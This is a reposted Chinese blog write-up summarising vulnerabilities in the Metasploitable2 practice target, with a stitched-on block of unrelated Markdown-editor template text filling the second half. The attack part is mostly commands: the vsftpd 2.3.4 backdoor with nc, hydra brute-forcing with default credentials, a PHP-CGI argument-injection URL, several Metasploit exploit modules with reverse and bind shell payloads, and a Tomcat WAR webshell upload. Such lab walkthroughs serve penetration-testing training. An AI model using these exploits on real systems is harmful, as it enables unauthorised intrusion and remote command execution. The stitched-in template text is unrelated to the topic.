metasploitable2 端口21vsftpd2.3.4笑脸后门漏洞22弱口令23弱口令25 CNNVD-200111-00453 ISC BIND80 http111 rpcbind1
使用nmap扫描可得:
程序的后门代码绑定的侦听端口是 6200。
通过ftp进行连接 在账号后加上:),密码随意,这时会登录失败,再次扫描6200端口,会发现6200端口已经打开,最后用nc连接6200端口就能执行命令了。也可以使用msf搜索vsftpd,利用msf里的脚本攻击。
hydra -L logins.txt -P pws.txt -M targets.txt ssh 或者 使用msf里的ssh_enumusers 来爆破(msfadmin/msfadmin)。
msfadmin/msfadmin
低危,产生超多SMTP错误导致服务拒绝(内存耗尽)。
/phpmyadmin/?-d+allow_url_include%3D1+-d+auto_prepend_file%3dphp://input
表示修改配置文件中的参数all_url_include(打开引用文件功能)和auto_prepend_file(附加文件)
passthru为执行命令
可以使用echo “” > /var/www/cmd.php 命令来添加shell
反弹shell操作
use auxiliary/scanner/misc/sunrpc_portmapper
search sunrpc
use exploit/multi/samba/usermap_script
最后smbclient -L //192.168.206.216获取共享目录
search smb (大部分为远程执行漏洞)
可能存在共享弱口令:netbiOS-ssn://192.168.230.130 (及使用IPC$连接,尝试连接未成功)
用户名/密码:User/User
hydra爆破
CVE-2011-3556:
use exploit/multi/misc/java_rmi_server
set payload java/meterpreter/reverse_tcp
set RHOSTS xxx
run
CVE-2017-3241 rmi反序列化漏洞
存在有缺陷的第三方库如commons-collections(主要缺陷为第三方库)
metasploitable2本身有shell,可以直接连接
nc 192.168.230.130 1524
nfs有信息泄露漏洞
showmount -e 192.168.230.130 2049
但是靶场好像没有
用户名root 密码为空
use exploit/unix/misc/distcc_execshow payloads set payload cmd/unix/bind_perlrun
爆破
爆破,密码为passWord
search rcd
use exploit/unix/irc/unreal_ircd_3281_backdoor
show options
set rhosts 192.168.206.216
run
poc下载:https://GitHub.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
当tomcat默认页面manager/html需要输入账号和密码时,metasploit 中有扫描器tomcat_mgr_login获取账号密码。用账号密码登录后,有上传war(压缩包rar改名为war)的地方,上传成功后,在url根目录添加上war包名/压缩包里的文件?cmd=whoami
也可以使用jar -cvf xx.war xx.jsp 生成war包,上传后访问 http://127.0.0.1:8080/war 包名(无后缀) / 包名内文件名
search drb
use use exploit/linux/misc/drb_remote_codeexec
set rhosts 192.168.206.216
run
撤销:Ctrl/Command + Z
重做:Ctrl/Command + Y
加粗:Ctrl/Command + B
斜体:Ctrl/Command + I
标题:Ctrl/Command + Shift + H
无序列表:Ctrl/Command + Shift + U
有序列表:Ctrl/Command + Shift + O
检查列表:Ctrl/Command + Shift + C
插入代码:Ctrl/Command + Shift + K
插入链接:Ctrl/Command + Shift + L
插入图片:Ctrl/Command + Shift + G
查找:Ctrl/Command + F
替换:Ctrl/Command + G
直接输入1次#,并按下space后,将生成1级标题。
输入2次#,并按下space后,将生成2级标题。
以此类推,我们支持6级标题。有助于使用TOC
语法后生成一个完美的目录。
强调文本 强调文本
加粗文本 加粗文本
标记文本
删除文本
引用文本
H2O is是液体。
210 运算结果是 1024.
链接: link.
图片:
带尺寸的图片:
居中的图片:
居中并且带尺寸的图片:
当然,我们为了让用户更加便捷,我们增加了图片拖拽功能。
去博客设置页面,选择一款你喜欢的代码片高亮样式,下面展示同样高亮的 代码片
.
// An highlighted blockvar foo = 'bar';
一个简单的表格是这么创建的:
项目 | Value |
---|---|
电脑 | $1600 |
手机 | $12 |
导管 | $1 |
使用:---------:
居中
使用:----------
居左
使用----------:
居右
第一列 | 第二列 | 第三列 |
---|---|---|
第一列文本居中 | 第二列文本居右 | 第三列文本居左 |
SmartyPants将ASCII标点字符转换为“智能”印刷标点HTML实体。例如:
TYPE | ASCII | HTML |
---|---|---|
Single backticks | 'Isn't this fun?' | ‘Isn’t this fun?’ |
Quotes | "Isn't this fun?" | “Isn’t this fun?” |
Dashes | -- is en-dash, --- is em-dash | – is en-dash, — is em-dash |
一个具有注脚的文本。1
Markdown将文本转换为 HTML。
您可以使用渲染LaTeX数学表达式 KaTeX:
Gamma公式展示 Γ ( n ) = ( n − 1 ) ! ∀ n ∈ N \Gamma(n) = (n-1)!\quad\forall n\in\mathbb N Γ(n)=(n−1)!∀n∈N 是通过欧拉积分
Γ(z)= ∫ 0 ∞ t z − 1 e − t dt . \Gamma(z) = \int_0^\infty t^{z-1}e^{-t}dt\,. Γ(z)=∫0∞tz−1e−tdt.
你可以找到更多关于的信息 LaTeX 数学表达式here.
可以使用UML图表进行渲染。 Mermaid. 例如下面产生的一个序列图:
这将产生一个流程图。:
我们依旧会支持flowchart的流程图:
如果你想尝试使用此编辑器, 你可以在此篇文章任意编辑。当你完成了一篇文章的写作, 在上方工具栏找到 文章导出 ,生成一个.md文件或者.html文件进行本地保存。
如果你想加载一篇你写过的.md文件,在上方工具栏可以选择导入功能进行对应扩展名的文件导入,
继续你的创作。
注脚的解释 ↩︎
来源地址:https://blog.csdn.net/qq_42552091/article/details/126332010
--结束END--
本文标题: metasploitable2靶场漏洞总结(部分)
本文链接: https://lsjlt.com/news/409688.html(转载时请注明来源链接)
有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
回答
回答
回答
回答
回答
回答
回答
回答
回答
回答
0